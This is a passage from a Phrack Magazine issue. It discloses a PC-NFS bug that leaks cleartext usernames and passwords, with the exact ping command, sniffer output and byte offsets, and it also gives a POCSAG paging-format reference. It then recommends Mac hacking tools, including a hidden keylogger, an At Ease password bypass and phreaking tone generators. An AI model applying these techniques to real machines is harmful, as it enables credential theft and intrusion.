1165 lines
60 KiB
Plaintext
1165 lines
60 KiB
Plaintext
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Seven, Issue Forty-Eight, File 3 of 18
|
|||
|
|
|||
|
|
|||
|
// // /\ // ====
|
|||
|
// // //\\ // ====
|
|||
|
==== // // \\/ ====
|
|||
|
|
|||
|
/\ // // \\ // /=== ====
|
|||
|
//\\ // // // // \=\ ====
|
|||
|
// \\/ \\ // // ===/ ====
|
|||
|
|
|||
|
Part I
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
PC-NFS Bug
|
|||
|
|
|||
|
|
|||
|
I have found a nice little security hole in PC-NFS version 5.x. If you
|
|||
|
ping a PC-NFS user with a packet size of between 1450 to 1480, the
|
|||
|
PC's ICMP reply packet will divulge:
|
|||
|
|
|||
|
o The hostname of the PC
|
|||
|
o The hostname of the PC's authentication server
|
|||
|
o The username of the person logged in
|
|||
|
o The password for the user (Thank you very much!)
|
|||
|
|
|||
|
All of this information is in clear text unless PC-NFS's NETLOGIN is
|
|||
|
used. NETLOGIN uses XOR as its encryption, so this is hardly secure
|
|||
|
either.
|
|||
|
|
|||
|
NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested
|
|||
|
and all freely return the above information on both PC-NFS versions
|
|||
|
5.0 and 5.1a. This should work with other driver/NIC configurations
|
|||
|
also.
|
|||
|
|
|||
|
You get the occasional added bonus of locking up the victims PC as
|
|||
|
well!
|
|||
|
|
|||
|
This bug was new to Sun and they have created a new PCNFS.SYS
|
|||
|
driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD.
|
|||
|
This new version fills reply ICMP packets with nulls after 200 bytes of
|
|||
|
the requested pattern.
|
|||
|
|
|||
|
Until you receive this patch from Sun, I would recommend setting all
|
|||
|
external router interface MTU to a value of no greater than 1350 as this
|
|||
|
is point where secrets are contained in the return packet.
|
|||
|
|
|||
|
The Unix command to generate the below results is as follows:
|
|||
|
|
|||
|
ping -s -c1 pchost.victim.com 1480
|
|||
|
|
|||
|
Use your favorite sniffer to filter ICMP packets and you have it. If you
|
|||
|
don't have a sniffer, try the -v(erbose) option of ping and convert the
|
|||
|
hex to ascii starting around byte 1382.
|
|||
|
|
|||
|
Sniffer output follows:
|
|||
|
|
|||
|
19:03:48.81
|
|||
|
ip: evil.com->pchost.victim.com
|
|||
|
icmp: echo request
|
|||
|
62: 024 025 026 027 030 031 032 033 034 035
|
|||
|
72: 036 037 ! " # $ % & '
|
|||
|
82: ( ) * + , - . / 0 1
|
|||
|
92: 2 3 4 5 6 7 8 9 : ;
|
|||
|
102: < = > ? @ A B C D E
|
|||
|
112: F G H I J K L M N O
|
|||
|
122: P Q R S T U V W X Y
|
|||
|
132: Z [ \ ] ^ _ ` a b c
|
|||
|
142: d e f g h i j k l m
|
|||
|
152: n o p q r s t u v w
|
|||
|
162: x y z { | } ~ 177 200 201
|
|||
|
172: 202 203 204 205 206 207 210 211 212 213
|
|||
|
182: 214 215 216 217 220 221 222 223 224 225
|
|||
|
192: 226 227 230 231 232 233 234 235 236 237
|
|||
|
202: 240 241 242 243 244 245 246 247 250 251
|
|||
|
212: 252 253 254 255 256 257 260 261 262 263
|
|||
|
222: 264 265 266 267 270 271 272 273 274 275
|
|||
|
232: 276 277 300 301 302 303 304 305 306 307
|
|||
|
242: 310 311 312 313 314 315 316 317 320 321
|
|||
|
252: 322 323 324 325 326 327 330 331 332 333
|
|||
|
262: 334 335 336 337 340 341 342 343 344 345
|
|||
|
272: 346 347 350 351 352 353 354 355 356 357
|
|||
|
282: 360 361 362 363 364 365 366 367 370 371
|
|||
|
292: 372 373 374 375 376 377 000 001 002 003
|
|||
|
302: 004 005 006 007 010 011 012 013 014 015
|
|||
|
312: 016 017 020 021 022 023 024 025 026 027
|
|||
|
322: 030 031 032 033 034 035 036 037 !
|
|||
|
332: " # $ % & ' ( ) * +
|
|||
|
342: , - . / 0 1 2 3 4 5
|
|||
|
352: 6 7 8 9 : ; < = > ?
|
|||
|
362: @ A B C D E F G H I
|
|||
|
372: J K L M N O P Q R S
|
|||
|
382: T U V W X Y Z [ \ ]
|
|||
|
392: ^ _ ` a b c d e f g
|
|||
|
402: h i j k l m n o p q
|
|||
|
412: r s t u v w x y z {
|
|||
|
422: | } ~ 177 200 201 202 203 204 205
|
|||
|
432: 206 207 210 211 212 213 214 215 216 217
|
|||
|
442: 220 221 222 223 224 225 226 227 230 231
|
|||
|
452: 232 233 234 235 236 237 240 241 242 243
|
|||
|
462: 244 245 246 247 250 251 252 253 254 255
|
|||
|
472: 256 257 260 261 262 263 264 265 266 267
|
|||
|
482: 270 271 272 273 274 275 276 277 300 301
|
|||
|
492: 302 303 304 305 306 307 310 311 312 313
|
|||
|
502: 314 315 316 317 320 321 322 323 324 325
|
|||
|
512: 326 327 330 331 332 333 334 335 336 337
|
|||
|
522: 340 341 342 343 344 345 346 347 350 351
|
|||
|
532: 352 353 354 355 356 357 360 361 362 363
|
|||
|
542: 364 365 366 367 370 371 372 373 374 375
|
|||
|
552: 376 377 000 001 002 003 004 005 006 007
|
|||
|
562: 010 011 012 013 014 015 016 017 020 021
|
|||
|
572: 022 023 024 025 026 027 030 031 032 033
|
|||
|
582: 034 035 036 037 ! " # $ %
|
|||
|
592: & ' ( ) * + , - . /
|
|||
|
602: 0 1 2 3 4 5 6 7 8 9
|
|||
|
612: : ; < = > ? @ A B C
|
|||
|
622: D E F G H I J K L M
|
|||
|
632: N O P Q R S T U V W
|
|||
|
642: X Y Z [ \ ] ^ _ ` a
|
|||
|
652: b c d e f g h i j k
|
|||
|
662: l m n o p q r s t u
|
|||
|
672: v w x y z { | } ~ 177
|
|||
|
682: 200 201 202 203 204 205 206 207 210 211
|
|||
|
692: 212 213 214 215 216 217 220 221 222 223
|
|||
|
702: 224 225 226 227 230 231 232 233 234 235
|
|||
|
712: 236 237 240 241 242 243 244 245 246 247
|
|||
|
722: 250 251 252 253 254 255 256 257 260 261
|
|||
|
732: 262 263 264 265 266 267 270 271 272 273
|
|||
|
742: 274 275 276 277 300 301 302 303 304 305
|
|||
|
752: 306 307 310 311 312 313 314 315 316 317
|
|||
|
762: 320 321 322 323 324 325 326 327 330 331
|
|||
|
772: 332 333 334 335 336 337 340 341 342 343
|
|||
|
782: 344 345 346 347 350 351 352 353 354 355
|
|||
|
792: 356 357 360 361 362 363 364 365 366 367
|
|||
|
802: 370 371 372 373 374 375 376 377 000 001
|
|||
|
812: 002 003 004 005 006 007 010 011 012 013
|
|||
|
822: 014 015 016 017 020 021 022 023 024 025
|
|||
|
832: 026 027 030 031 032 033 034 035 036 037
|
|||
|
842: ! " # $ % & ' ( )
|
|||
|
852: * + , - . / 0 1 2 3
|
|||
|
862: 4 5 6 7 8 9 : ; < =
|
|||
|
872: > ? @ A B C D E F G
|
|||
|
882: H I J K L M N O P Q
|
|||
|
892: R S T U V W X Y Z [
|
|||
|
902: \ ] ^ _ ` a b c d e
|
|||
|
912: f g h i j k l m n o
|
|||
|
922: p q r s t u v w x y
|
|||
|
932: z { | } ~ 177 200 201 202 203
|
|||
|
942: 204 205 206 207 210 211 212 213 214 215
|
|||
|
952: 216 217 220 221 222 223 224 225 226 227
|
|||
|
962: 230 231 232 233 234 235 236 237 240 241
|
|||
|
972: 242 243 244 245 246 247 250 251 252 253
|
|||
|
982: 254 255 256 257 260 261 262 263 264 265
|
|||
|
992: 266 267 270 271 272 273 274 275 276 277
|
|||
|
1002: 300 301 302 303 304 305 306 307 310 311
|
|||
|
1012: 312 313 314 315 316 317 320 321 322 323
|
|||
|
1022: 324 325 326 327 330 331 332 333 334 335
|
|||
|
1032: 336 337 340 341 342 343 344 345 346 347
|
|||
|
1042: 350 351 352 353 354 355 356 357 360 361
|
|||
|
1052: 362 363 364 365 366 367 370 371 372 373
|
|||
|
1062: 374 375 376 377 000 001 002 003 004 005
|
|||
|
1072: 006 007 010 011 012 013 014 015 016 017
|
|||
|
1082: 020 021 022 023 024 025 026 027 030 031
|
|||
|
1092: 032 033 034 035 036 037 ! " #
|
|||
|
1102: $ % & ' ( ) * + , -
|
|||
|
1112: . / 0 1 2 3 4 5 6 7
|
|||
|
1122: 8 9 : ; < = > ? @ A
|
|||
|
1132: B C D E F G H I J K
|
|||
|
1142: L M N O P Q R S T U
|
|||
|
1152: V W X Y Z [ \ ] ^ _
|
|||
|
1162: ` a b c d e f g h i
|
|||
|
1172: j k l m n o p q r s
|
|||
|
1182: t u v w x y z { | }
|
|||
|
1192: ~ 177 200 201 202 203 204 205 206 207
|
|||
|
1202: 210 211 212 213 214 215 216 217 220 221
|
|||
|
1212: 222 223 224 225 226 227 230 231 232 233
|
|||
|
1222: 234 235 236 237 240 241 242 243 244 245
|
|||
|
1232: 246 247 250 251 252 253 254 255 256 257
|
|||
|
1242: 260 261 262 263 264 265 266 267 270 271
|
|||
|
1252: 272 273 274 275 276 277 300 301 302 303
|
|||
|
1262: 304 305 306 307 310 311 312 313 314 315
|
|||
|
1272: 316 317 320 321 322 323 324 325 326 327
|
|||
|
1282: 330 331 332 333 334 335 336 337 340 341
|
|||
|
1292: 342 343 344 345 346 347 350 351 352 353
|
|||
|
1302: 354 355 356 357 360 361 362 363 364 365
|
|||
|
1312: 366 367 370 371 372 373 374 375 376 377
|
|||
|
1322: 000 001 002 003 004 005 006 007 010 011
|
|||
|
1332: 012 013 014 015 016 017 020 021 022 023
|
|||
|
1342: 024 025 026 027 030 031 032 033 034 035
|
|||
|
1352: 036 037 ! " # $ % & '
|
|||
|
1362: ( ) * + , - . / 0 1
|
|||
|
1372: 2 3 4 5 6 7 8 9 : ;
|
|||
|
1382: < = > ? @ A B C D E
|
|||
|
1392: F G H I J K L M N O
|
|||
|
1402: P Q R S T U V W X Y
|
|||
|
1412: Z [ \ ] ^ _ ` a b c
|
|||
|
1422: d e f g h i j k l m
|
|||
|
1432: n o p q r s t u v w
|
|||
|
1442: x y z { | } ~ 177 200 201
|
|||
|
1452: 202 203 204 205 206 207 210 211 212 213
|
|||
|
1462: 214 215 216 217 220 221 222 223 224 225
|
|||
|
1472: 226 227 230 231 232 233 234 235 236 237
|
|||
|
1482: 240 241 242 243 244 245 246 247 250 251
|
|||
|
|
|||
|
19:03:48.85
|
|||
|
ip: pchost.victim.com->evil
|
|||
|
icmp: echo reply
|
|||
|
62: 024 025 026 027 030 031 032 033 034 035
|
|||
|
72: 036 037 ! " # $ % & '
|
|||
|
82: ( ) * + , - . / 0 1
|
|||
|
92: 2 3 4 5 6 7 8 9 : ;
|
|||
|
102: < = > ? @ A B C D E
|
|||
|
112: F G H I J K L M N O
|
|||
|
122: P Q R S T U V W X Y
|
|||
|
132: Z [ \ ] ^ _ ` a b c
|
|||
|
142: d e f g h i j k l m
|
|||
|
152: n o p q r s t u v w
|
|||
|
162: x y z { | } ~ 177 200 201
|
|||
|
172: 202 203 204 205 206 207 210 211 212 213
|
|||
|
182: 214 215 216 217 220 221 222 223 224 225
|
|||
|
192: 226 227 230 231 232 233 234 235 236 237
|
|||
|
202: 240 241 242 243 244 245 246 247 250 251
|
|||
|
212: 252 253 254 255 256 257 260 261 262 263
|
|||
|
222: 264 265 266 267 270 271 272 273 274 275
|
|||
|
232: 276 277 300 301 302 303 304 305 306 307
|
|||
|
242: 310 311 312 313 314 315 316 317 320 321
|
|||
|
252: 322 323 324 325 000 000 324 005 ^ $
|
|||
|
262: : 004 000 000 000 000 000 000 000 000
|
|||
|
272: 036 006 W V P S Q R 016 007
|
|||
|
282: 277 ^ $ 213 367 350 X p r c
|
|||
|
292: 212 E " < 000 u 005 350 V 003
|
|||
|
302: 353 W < 005 u 005 350 W 002 353
|
|||
|
312: N < 010 u 007 306 006 325 # 001
|
|||
|
322: 353 H < 015 u 007 306 006 325 #
|
|||
|
332: 001 353 = < 017 u 007 306 006 325
|
|||
|
342: # 001 353 2 < 022 u 005 350 021
|
|||
|
352: 002 353 $ < 003 u 005 350 9 003
|
|||
|
362: 353 033 < 022 w 017 2 344 213 360
|
|||
|
372: 212 204 300 # P 350 225 305 X 353
|
|||
|
382: 010 P 270 c 000 350 213 305 X 306
|
|||
|
392: 006 205 347 000 Z Y [ X ^ _
|
|||
|
402: 007 037 313 P S Q R U 036 006
|
|||
|
412: W V 214 310 216 330 216 300 306 006
|
|||
|
422: 325 # 000 373 277 ^ $ 273 A 347
|
|||
|
432: 271 006 000 215 6 d $ 212 004 210
|
|||
|
442: 005 212 007 210 004 F G C 342 363
|
|||
|
452: 241 x $ 243 | $ 241 z $ 243
|
|||
|
462: ~ $ 241 324 ) 243 x $ 241 326
|
|||
|
472: ) 243 z $ 277 ^ $ 212 E "
|
|||
|
482: < 010 u 015 P 270 ` 000 350 $
|
|||
|
492: 305 X 350 275 001 353 022 < 015 u
|
|||
|
502: 012 P 270 a 000 350 023 305 X 353
|
|||
|
512: 004 < 017 u 003 350 017 000 306 006
|
|||
|
522: 205 347 000 ^ _ 007 037 ] Z Y
|
|||
|
532: [ X 303 P 270 < 000 350 363 304
|
|||
|
542: X 307 E $ 000 000 215 u " 213
|
|||
|
552: M 020 206 351 203 351 024 367 301 001
|
|||
|
562: 000 t 006 213 331 306 000 000 A 321
|
|||
|
572: 371 350 , o 211 ] $ 307 E 030
|
|||
|
582: 000 000 215 u 016 271 012 000 350 033
|
|||
|
592: o 211 ] 030 213 E 020 206 340 005
|
|||
|
602: 016 000 243 ` % 211 > b % 214
|
|||
|
612: 016 d % 277 ^ % . 376 006 ?
|
|||
|
622: 020 350 9 276 . 376 016 ? 020 303
|
|||
|
632: & 213 E 002 013 300 t 020 243 326
|
|||
|
642: # & 213 ] 004 211 036 330 # 350
|
|||
|
652: 231 m 353 0 200 > 324 ) 000 t
|
|||
|
662: 033 & 203 } 006 000 t 024 203 >
|
|||
|
672: 326 # 000 u 015 350 031 000 203 >
|
|||
|
682: 326 # 000 t 003 350 u m 241 326
|
|||
|
692: # & 211 E 002 241 330 # & 211
|
|||
|
702: E 004 303 & 213 M 006 006 V W
|
|||
|
712: 016 007 272 000 000 277 334 # 350 $
|
|||
|
722: 000 241 323 # 243 350 X 203 > 326
|
|||
|
732: # 000 u 023 366 006 343 015 001 u
|
|||
|
742: 014 203 > 350 X 000 u 353 272 001
|
|||
|
752: 000 342 332 _ ^ 007 303 Q R W
|
|||
|
762: 203 372 000 u 021 203 > 030 214 000
|
|||
|
772: t 012 276 004 214 271 003 000 363 245
|
|||
|
782: 353 010 270 377 377 271 003 000 363 253
|
|||
|
792: 276 A 347 271 003 000 363 245 _ 270
|
|||
|
802: 377 377 211 E 036 211 E 241 324
|
|||
|
812: ) 211 E 032 241 326 ) 211 E 034
|
|||
|
822: 270 000 206 340 211 E 020 306 E
|
|||
|
832: 016 E 306 E 017 000 307 E 022 000
|
|||
|
842: 000 307 E 024 000 000 306 E 026 002
|
|||
|
852: 306 E 027 001 307 E 014 010 000 3
|
|||
|
862: 300 306 E " 021 210 E # 211 E
|
|||
|
872: & 211 E ( 350 250 376 Z Y 303
|
|||
|
882: 200 > 326 # 000 u 014 213 E *
|
|||
|
892: 243 326 # 213 E , 243 330 # P
|
|||
|
902: 270 V 000 350 205 303 X 303 P S
|
|||
|
912: Q R 213 E : 213 ] < 213 M
|
|||
|
922: & 213 U ( 350 223 k Z Y [
|
|||
|
932: X P 270 \ 000 350 e 303 X 303
|
|||
|
942: 306 E " 000 P 270 X 000 350 X
|
|||
|
952: 303 X 303 & 213 E 002 & 213 ]
|
|||
|
962: 004 & 213 U 006 006 W 016 007 350
|
|||
|
972: Y i s 003 351 227 000 277 334 #
|
|||
|
982: W 271 003 000 363 245 276 A 347 271
|
|||
|
992: 003 000 363 245 _ 211 E 036 211 ]
|
|||
|
1002: 241 324 ) 211 E 032 241 326 )
|
|||
|
1012: 211 E 034 270 000 206 340 211 E
|
|||
|
1022: 020 306 E 016 E 306 E 017 000 307
|
|||
|
1032: E 022 000 000 307 E 024 000 000 306
|
|||
|
1042: E 026 377 306 E 027 001 307 E 014
|
|||
|
1052: 010 000 3 300 306 E " 010 210 E
|
|||
|
1062: # 211 E & 377 006 h % 241 h
|
|||
|
1072: % 211 E ( 211 026 350 X 211 026
|
|||
|
1082: l % 307 006 j % 000 000 350 322
|
|||
|
1092: 375 203 > 350 X 000 t # 366 006
|
|||
|
1102: 343 015 001 u ! 203 > j % 000
|
|||
|
1112: t 353 203 > j % 001 u 011 241
|
|||
|
1122: l % + 006 350 X 353 015 270 375
|
|||
|
1132: 377 353 010 270 376 377 353 003 270 377
|
|||
|
1142: 377 307 006 l % 000 000 _ 007 &
|
|||
|
1152: 211 E 010 303 P 270 ^ 000 350 206
|
|||
|
1162: 302 X 203 > l % 000 t 017 213
|
|||
|
1172: ] ( ; 036 h % u 006 307 006
|
|||
|
1182: j % 001 000 303 P 270 ; 000 350
|
|||
|
1192: g 302 X 203 > l % 000 t 006
|
|||
|
1202: 307 006 j % 002 000 303 000 000 000
|
|||
|
1212: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1222: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1232: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1242: 000 000 000 000 000 000 000 000 002 000
|
|||
|
1252: 000 000 300 A 000 000 034 000 000 000
|
|||
|
1262: 200 000 000 000 k 000 000 000 000 016
|
|||
|
1272: 000 000 000 000 000 000 000 000 000
|
|||
|
1282: 010 000 000 000 252 001 000 000 010 5
|
|||
|
1292: 000 000 r 027 301 . 000 000 000 000
|
|||
|
1302: 036 F 300 . 000 000 000 000 036 F
|
|||
|
1312: 300 . 000 000 000 000 000 000 000 000
|
|||
|
1322: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1332: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1342: 000 000 000 000 000 000 000 000 000
|
|||
|
1352: 000 000 000 002 000 000 200 366 = 000
|
|||
|
1362: { 255 023 000 242 265 015 000 002 000
|
|||
|
1372: 000 000 S 017 005 000 C 003 000 000
|
|||
|
1382: p c h o s t 000 000 000 000
|
|||
|
1392: 000 000 000 000 000 000 244 A @ -
|
|||
|
1402: s e r v e r 1 000 000 000
|
|||
|
1412: 000 000 000 000 000 000 244 A @ 001
|
|||
|
1422: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1432: 000 000 000 000 000 000 244 A @ 001
|
|||
|
1442: u s e r n a m e 000 000
|
|||
|
1452: p a s s w d 000 000 000 000
|
|||
|
1462: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1472: 000 000 000 000 000 000 000 000 000 000
|
|||
|
1482: 000 000 200 000 k 000 260 271 377 377
|
|||
|
1492: 344 275 9 212
|
|||
|
|
|||
|
The names have been changed to protect the innocent, but the rest is actual.
|
|||
|
|
|||
|
Byte 1382: PC's hostname
|
|||
|
Byte 1402: PC's Authentication server hostname
|
|||
|
Byte 1382: The user's account name. Shows nobody if logged out.
|
|||
|
Byte 1382: The user's password.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
POCSAG paging format, code and code capacity
|
|||
|
|
|||
|
The POCSAG (Post Office Code Standardization Advisory Group) code is a
|
|||
|
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
|
|||
|
structure. The POCSAG codes provides improved battery-saving capability and an
|
|||
|
increased code capacity.
|
|||
|
The POCSAG code format consists of a preamble and one or more batches of
|
|||
|
codewords. Each batch comprises a 32-bit frame synchronization code and eight
|
|||
|
64-bit address frames of two 32-bit addresses or idle codewords each. The
|
|||
|
frame synchronization code marks the start of the batch of codewords.
|
|||
|
|
|||
|
-PREAMBLE STRUCTURE
|
|||
|
The preamble consists of 576 bits of an alternating 101010 pattern transmitted
|
|||
|
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
|
|||
|
determine if the data received is a POCSAG signal and for synchronization with
|
|||
|
the stream of data.
|
|||
|
|
|||
|
|---Preamble----|-----------First Batch-------------|--Subsec. Batch--|
|
|||
|
|
|||
|
______________________________________________________< <____________
|
|||
|
paging | 576 bits of | | | | | | | | | | | > > |
|
|||
|
format | reversals |F| | | | | | | | | | | | | | | | |F| |
|
|||
|
| (101010, etc) |S| | | | | | | | | | | | | | | | |S| |
|
|||
|
|_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
|
|||
|
> >
|
|||
|
1 FRAME = 2 CODEWORDS
|
|||
|
|
|||
|
Preamble Batchs
|
|||
|
|
|||
|
512 BPS 1125 mS 1062.5 mS
|
|||
|
|
|||
|
1200 BPS 480 mS 453.3 mS
|
|||
|
|
|||
|
CodeWords Structure
|
|||
|
____________________________________________________________________
|
|||
|
BIT | | | | | |
|
|||
|
NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 |
|
|||
|
|___|______________|_______|_______________________|_________________|
|
|||
|
____________________________________________________________________
|
|||
|
ADDRESS| | | | | |
|
|||
|
FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity |
|
|||
|
|___|______________|_______|_______________________|_________________|
|
|||
|
^
|
|||
|
Source identifier bits
|
|||
|
____________________________________________________________________
|
|||
|
MESSAGE| | | | |
|
|||
|
FORMAT | 1 | Message Bits | Parity Check Bits | Even parity |
|
|||
|
|___|______________________|_______________________|_________________|
|
|||
|
|
|||
|
-BATCH STRUCTURE
|
|||
|
A batch consist of frame synchronization code follow by 8 frames of two address
|
|||
|
codewords per frame (16 address codewords per batch). In order to maintain the
|
|||
|
proper batch structure, each frame is filled with two address codewords, or two
|
|||
|
idle codewords, or two message codewords, or any appropriate combination of the
|
|||
|
three codewords types.
|
|||
|
|
|||
|
-FRAME SYNCHRONIZATION CODE STRUCTURE
|
|||
|
The frame synchronization (FS) code is a unique, reserved word that is used to
|
|||
|
identify the beginning of each batch. The FS code comprises the 32 bits:
|
|||
|
|
|||
|
011111100110100100001010111011000.
|
|||
|
|
|||
|
-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
|
|||
|
An alternate frame synchronization (AFS) code can be selected to support special
|
|||
|
systems or systems that require increased coding capability. The AFS is
|
|||
|
generated in the same manner as an address codeword (i.e., BCH codeword with
|
|||
|
parity bits). The POCSAG signaling standard has reserved special codewords for
|
|||
|
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
|
|||
|
system to support the AFS. The AFS will change to frame 0 on the programmer
|
|||
|
since no frame information is included in the AFS. The AFS should use address
|
|||
|
1 so that bit 20 and 21 are 0.
|
|||
|
|
|||
|
-ADDRESS CODEWORD STRUCTURE
|
|||
|
An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
|
|||
|
the address bits. The pagers looks at these bits to find its own unique
|
|||
|
address. Each POCSAG codeword is capable of providing address information for
|
|||
|
four different paging sources (Address 1 to 4). These address are determined
|
|||
|
by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
|
|||
|
22 through 31 are the parity check bits, and bit 32 is the even parity bit.
|
|||
|
|
|||
|
|
|||
|
BIT 20 BIT 21
|
|||
|
Address 1 0 0
|
|||
|
Address 2 0 1
|
|||
|
Address 3 1 0
|
|||
|
Address 4 1 1
|
|||
|
|
|||
|
Pre-coded into the code plug are three bits which designate the frame location,
|
|||
|
within each batch, at which the pager's address is to be received; the decoder
|
|||
|
will look at the codewords in this frame for its address.
|
|||
|
Power is removed from the receiver during all frames other than the precoded
|
|||
|
one, thus extending pager battery life.
|
|||
|
|
|||
|
-CODE CAPACITY
|
|||
|
The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
|
|||
|
s
|
|||
|
bits are the most-significant bits.
|
|||
|
|
|||
|
-MESSAGE CODEWORD STRUCTURE
|
|||
|
A message codeword structure always start with a 1 in bit 1 and always follows
|
|||
|
directly after the address. Each message codeword replaces an address codeword
|
|||
|
in the batch.
|
|||
|
|
|||
|
-IDLE CODEWORD STRUCTURE
|
|||
|
The idle codeword is unique, reserved codeword used to talk place of an address
|
|||
|
in any frame that would not otherwise be filled with 64 bits.
|
|||
|
Thus, if a frame contains only an address, an idle codeword comprises the 32
|
|||
|
bits:
|
|||
|
|
|||
|
01111010100010011100000110010111
|
|||
|
|
|||
|
-POCSAG CHARACTERS
|
|||
|
|
|||
|
CHAR HEX | CHAR HEX | CHAR HEX |
|
|||
|
| | |
|
|||
|
# 23 | $ 24 | @ 40 |
|
|||
|
[ 5B | \ 5C | ] 5D |
|
|||
|
^ 5E | _ 5F | ' 60 |
|
|||
|
{ 7B | | 7C | } 7D |
|
|||
|
~ 7E | DEL 7F | SP 20 |
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
MACINTOSH HACKING
|
|||
|
by Logik Bomb
|
|||
|
|
|||
|
"My fellow astronauts..."
|
|||
|
-Dan Quayle
|
|||
|
|
|||
|
Now, two people have mailed Erik Bloodaxe asking about Macintosh
|
|||
|
hacking particularly war dialers, and each time he insulted Macs and tried
|
|||
|
to get someone to write a file on it. No one has done it. So I guess I have
|
|||
|
to.
|
|||
|
First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
|
|||
|
originators of the Apple and the Macintosh were busted for phreaking in
|
|||
|
college. The Apple IIe was used almost universally by hackers. So why has
|
|||
|
the Mac fallen out of favor for hacking? Simple. Because it fell out of
|
|||
|
favor for everything else. Apple screwed up and wouldn't let clone makers
|
|||
|
license the MacOS. As a result, 80% of personal computers run DOS, and
|
|||
|
Macintoshes are left in the minority. Second, DOS compatible users, and
|
|||
|
hackers in particular, have an image of Mac users as a bunch of whiny
|
|||
|
lamers who paid too much for a computer and as a result are constantly
|
|||
|
defensive. The solution to this impression is to not be an asshole. I know
|
|||
|
it drives every Mac user crazy when he reads some article about Windows
|
|||
|
95's brand new, advanced features such as "plug-and-play" that the
|
|||
|
Macintosh has had since 1984. But just try and take it. If it's any
|
|||
|
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
|
|||
|
hate Windows too.
|
|||
|
Now, on with the software.
|
|||
|
-------------------------
|
|||
|
Assault Dialer 1.5
|
|||
|
Assault Dialer, by Crush Commando, is the premier Mac war dialer,
|
|||
|
the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
|
|||
|
have right now. It is the successor to a previous war dialer known as Holy
|
|||
|
War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
|
|||
|
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
|
|||
|
1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
|
|||
|
now.
|
|||
|
|
|||
|
MacPGP 2.6.2 and PGPfone 1.0b4
|
|||
|
MacPGP is the Macintosh port of the infamous PGP (Pretty Good
|
|||
|
Privacy.) This file is not about cryptography, so if you want to know about
|
|||
|
PGP read the fuckin' read me and docs that come with the file. Strangely
|
|||
|
enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
|
|||
|
your phone and making it a secure line, for the Mac _first._ I don't know
|
|||
|
why, and I haven't had a chance to test it, but the idea's pretty cool. If
|
|||
|
PGP doesn't get Zimmerman thrown in jail, this will.
|
|||
|
|
|||
|
DisEase 1.0 and DisEase 3.0
|
|||
|
Schools and concerned parents have always had a problem. Schools
|
|||
|
can't have students deleting the hard drive, and parents don't want their
|
|||
|
kids looking at the kinky pictures they downloaded. So Apple came out with
|
|||
|
At Ease, an operating system that runs over System 7, sort of the same way
|
|||
|
Windows runs off of DOS. However, I can't stand At Ease. Everything about
|
|||
|
it, from the Fisher-Price screen to the interface drives me crazy. It
|
|||
|
drives a lot of other people crazy too. So it was just a matter of time
|
|||
|
before someone made a program to override it. The first was DisEase 1.0, a
|
|||
|
small program by someone calling himself Omletman, that would override At
|
|||
|
Ease if you put in a floppy loaded with it and clicked six times. Omletman
|
|||
|
improved this design and eventually released 3.0. (I haven't been able to
|
|||
|
find any evidence that a 2.0 was ever released) 3.0 has such cool features
|
|||
|
as reading the preferences file to give you the password, so you can change
|
|||
|
the obnoxious greeting teachers always put to something more sinister. The
|
|||
|
only problem with 3.0 is that some configurations of At Ease only let
|
|||
|
documents be read off of disks; no applications, which means DisEase 3.0
|
|||
|
won't appear, and so you can't run it. However, with 1.0 you don't have to
|
|||
|
actually open the application, you just click six times, so if you use 1.0
|
|||
|
to get to the finder, and then 3.0 to read the passwords, things will work.
|
|||
|
|
|||
|
Invisible Oasis Installer
|
|||
|
Oasis is a keystroke recorder, so you can find out passwords.
|
|||
|
However, with the original Oasis, you had to put it in the Extensions
|
|||
|
folder and make it invisible with ResEdit, which takes a while. Invisible
|
|||
|
Oasis Installer, however, installs it where it should be and automatically
|
|||
|
makes it invisible.
|
|||
|
"So everything's wrapped up in a nice neat little _package_, then?"
|
|||
|
-Homer Simpson
|
|||
|
|
|||
|
Anonymity 2.0 and Repersonalize 1.0
|
|||
|
Anonymity, version 1.2, was a rather old program whose author has
|
|||
|
long been forgotten that was the best data fork alterer available. It
|
|||
|
removed the personalization to programs. However, in around 1990 someone
|
|||
|
named the Doctor made 2.0, a version with some improvements. Repersonalize
|
|||
|
was made in 1988 (God, Mac hacking programs are old) which reset
|
|||
|
personalization on some of the Microsoft and Claris programs, so you could
|
|||
|
enter a different personalization name. I don't know if it will still work
|
|||
|
on Microsoft Word 6.0.1 and versions of programs released recently, but I
|
|||
|
don't really care because I use Word 5.1a and I'm probably not going to
|
|||
|
upgrade for a while.
|
|||
|
|
|||
|
Phoney (AKA Phoney4Mac)
|
|||
|
Phoney is an excellent program that emulates the Blue Box, Red Box,
|
|||
|
Black Box and Green Box tones. There is also Phoney4Newton, which does the
|
|||
|
same thing on the most portable of computers, the Newton.
|
|||
|
|
|||
|
That's all I'm covering in this file as far as Mac hacking
|
|||
|
programs. You'll probably want to know where to find all this crap, so here
|
|||
|
